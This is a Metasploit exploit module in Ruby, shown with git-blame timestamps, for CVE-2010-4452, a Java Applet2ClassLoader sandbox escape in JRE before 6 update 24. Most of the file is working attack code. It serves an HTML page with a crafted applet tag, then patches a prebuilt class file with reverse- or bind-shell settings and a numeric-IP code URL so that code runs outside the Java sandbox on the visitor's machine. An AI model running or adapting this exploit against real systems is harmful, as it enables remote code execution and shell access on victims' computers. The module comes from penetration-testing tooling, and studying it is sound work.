2011-03-16 04:50:25 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2011-03-16 04:50:25 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
|
|
|
|
|
|
def initialize( info = {} )
|
|
|
|
super( update_info( info,
|
2011-10-15 22:58:20 +00:00
|
|
|
'Name' => 'Sun Java Applet2ClassLoader Remote Code Execution',
|
2011-03-16 04:50:25 +00:00
|
|
|
'Description' => %q{
|
2011-03-17 23:57:11 +00:00
|
|
|
This module exploits a vulnerability in the Java Runtime Environment
|
|
|
|
that allows an attacker to run an applet outside of the Java Sandbox. When
|
|
|
|
an applet is invoked with:
|
2011-03-16 04:50:25 +00:00
|
|
|
|
2011-03-17 23:57:11 +00:00
|
|
|
1. A "codebase" parameter that points at a trusted directory
|
|
|
|
2. A "code" parameter that is a URL that does not contain any dots
|
|
|
|
|
|
|
|
the applet will run outside of the sandbox.
|
|
|
|
|
|
|
|
This vulnerability affects JRE prior to version 6 update 24.
|
2011-03-16 04:50:25 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [
|
|
|
|
'Frederic Hoguin', # Discovery, PoC
|
|
|
|
'jduck' # Metasploit module
|
|
|
|
],
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2010-4452' ],
|
2011-03-18 00:16:06 +00:00
|
|
|
[ 'OSVDB', '71193' ],
|
2011-03-16 04:50:25 +00:00
|
|
|
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-084/' ],
|
|
|
|
[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],
|
|
|
|
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]
|
|
|
|
],
|
2011-03-17 23:57:11 +00:00
|
|
|
'Platform' => [ 'java' ], #, 'win' ],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 20480,
|
|
|
|
'BadChars' => '',
|
|
|
|
'DisableNops' => true,
|
|
|
|
'Compat' =>
|
|
|
|
{
|
2011-03-18 00:52:58 +00:00
|
|
|
'ConnectionType' => '-find'
|
2011-03-17 23:57:11 +00:00
|
|
|
}
|
|
|
|
},
|
2011-03-16 04:50:25 +00:00
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23
|
|
|
|
# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23
|
2011-03-17 23:57:11 +00:00
|
|
|
[ 'Generic (Java Payload)',
|
|
|
|
{
|
|
|
|
'Arch' => ARCH_JAVA,
|
|
|
|
'Platform' => 'java',
|
|
|
|
}
|
|
|
|
],
|
2011-11-28 04:42:59 +00:00
|
|
|
|
2011-03-17 23:57:11 +00:00
|
|
|
# Native payloads aren't currently supported (only work with jar/war)
|
2011-03-16 04:50:25 +00:00
|
|
|
=begin
|
|
|
|
[ 'Windows x86',
|
|
|
|
{
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'win',
|
|
|
|
}
|
|
|
|
],
|
|
|
|
=end
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'DisclosureDate' => 'Feb 15 2011'
|
|
|
|
))
|
2011-11-28 04:42:59 +00:00
|
|
|
|
2011-03-16 04:50:25 +00:00
|
|
|
register_options(
|
|
|
|
[
|
2011-03-17 23:57:11 +00:00
|
|
|
# This is the default for a 32-bit Windows install
|
2011-03-16 04:50:25 +00:00
|
|
|
OptString.new('LIBPATH', [ false, "The codebase path to use (privileged)",
|
|
|
|
"C:\\Program Files\\java\\jre6\\lib\\ext"]),
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
path = [ Msf::Config.data_directory, "exploits", "cve-2010-4452", "AppletX.class" ].join(::File::SEPARATOR)
|
|
|
|
@java_class = nil
|
|
|
|
File.open(path, "rb") { |fd|
|
|
|
|
@java_class = fd.read(fd.stat.size)
|
|
|
|
}
|
|
|
|
if not @java_class
|
|
|
|
raise RuntimeError, "Unable to load java class"
|
|
|
|
end
|
|
|
|
|
|
|
|
super
|
|
|
|
end
|
|
|
|
|
|
|
|
def on_request_uri(cli, request)
|
|
|
|
#print_status("Received request: #{request.uri}")
|
|
|
|
|
|
|
|
jpath = get_uri(cli)
|
|
|
|
#print_status(jpath)
|
|
|
|
|
|
|
|
# Do what get_uri does so that we can replace it in the string
|
|
|
|
host = Rex::Socket.source_address(cli.peerhost)
|
|
|
|
host_num = Rex::Socket.addr_aton(host).unpack('N').first
|
|
|
|
code_url = jpath.sub(host, host_num.to_s)
|
|
|
|
|
2011-03-18 01:18:18 +00:00
|
|
|
codebase = "file:" + datastore['LIBPATH']
|
2011-03-16 04:50:25 +00:00
|
|
|
|
2011-03-17 23:57:11 +00:00
|
|
|
config = "Spawn=2\nLPORT=#{datastore['LPORT']}\n"
|
|
|
|
# The java payloads decide to be reverse if LHOST is set.
|
|
|
|
config << "LHOST=#{datastore['LHOST']}\n" if datastore['PAYLOAD'] =~ /reverse/
|
|
|
|
config_off = 0x10e
|
|
|
|
|
|
|
|
cn_off = 0x2f76
|
2011-03-16 04:50:25 +00:00
|
|
|
|
|
|
|
case request.uri
|
|
|
|
|
|
|
|
when /\.class$/
|
2011-03-17 23:57:11 +00:00
|
|
|
# NOTE: the payload for this module is implemented in the .class file directly.
|
|
|
|
#
|
|
|
|
# This is due to the following:
|
|
|
|
# 1. The file must be a single .class file
|
|
|
|
# 2. The class inside must derive from Applet
|
|
|
|
#
|
|
|
|
# As such, we do not use the traditional payload generation facilities.
|
2011-03-18 00:52:58 +00:00
|
|
|
# However, we call the following so that bind payloads will properly
|
|
|
|
# connect to the client instead of using RHOST
|
|
|
|
p = regenerate_payload(cli)
|
2011-03-16 04:50:25 +00:00
|
|
|
|
|
|
|
print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")
|
|
|
|
|
|
|
|
cls = @java_class.dup
|
2011-03-17 23:57:11 +00:00
|
|
|
cls[config_off,2] = [config.length].pack('n')
|
|
|
|
cls[config_off+2,8] = config
|
2011-03-16 04:50:25 +00:00
|
|
|
|
2011-03-17 23:57:11 +00:00
|
|
|
cn_off += (config.length - 8) # the original length was 8 (CONFIGZZ)
|
2011-03-16 04:50:25 +00:00
|
|
|
cls[cn_off,2] = [code_url.length].pack('n')
|
|
|
|
cls[cn_off+2,7] = code_url
|
|
|
|
|
|
|
|
#File.open('ughz.class', 'wb') { |fd| fd.write cls }
|
|
|
|
|
|
|
|
send_response(cli, cls, { 'Content-Type' => "application/octet-stream" })
|
|
|
|
handler(cli)
|
|
|
|
|
|
|
|
else
|
|
|
|
html = <<-EOS
|
|
|
|
<html>
|
|
|
|
<body>
|
|
|
|
<applet codebase="#{codebase}" code="#{code_url}" />
|
|
|
|
</body>
|
|
|
|
</html>
|
|
|
|
EOS
|
|
|
|
print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")
|
|
|
|
send_response_html(cli, html)
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|